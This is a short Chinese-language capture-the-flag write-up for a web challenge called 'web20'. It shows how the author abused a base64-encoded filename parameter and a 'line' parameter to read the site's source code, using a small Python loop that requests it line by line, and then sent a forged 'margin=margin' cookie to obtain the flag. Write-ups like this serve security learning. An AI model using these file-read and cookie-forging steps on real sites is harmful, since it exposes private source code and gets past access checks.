web20

题目描述:

cookies欺骗

进入环境

进入环境

有一堆不明所以的字母

url栏里有一串base64的编码

解码后得到

keys.txt

emmmm

这里应该是把文件名给编码之后才能执行

用没编码过的文件名去访问的话没有任何回显

这里文件包含

可以包含keys.txt应该也可以包含主页文件

把index.php给编码过后再访问

但是没有任何回显。。

emmmmmm

想了看了几分钟发现url栏里还GET请求了一个line

line英文有行的意思

就试着输入了一个1

就回显了一串源码

在line那输入2

emmmm

但是这样看着好不方便啊

写个脚本吧

  1 import requests
  2 num = 1
  3 while True:
  4     num += 1
  5     url = 'http://114.67.246.176:18408/index.php?line=' + str(
  6         num) + '&filename=aW5kZXgucGhw'
  7     text = requests.get(url)
  8     print(text.text)
  9     if text.text == '':
 10         exit()

得到源码

从源码得知

要请求一个keys.php

而且要cookie等于margin=margin才行

所以抓个bp包

得到flag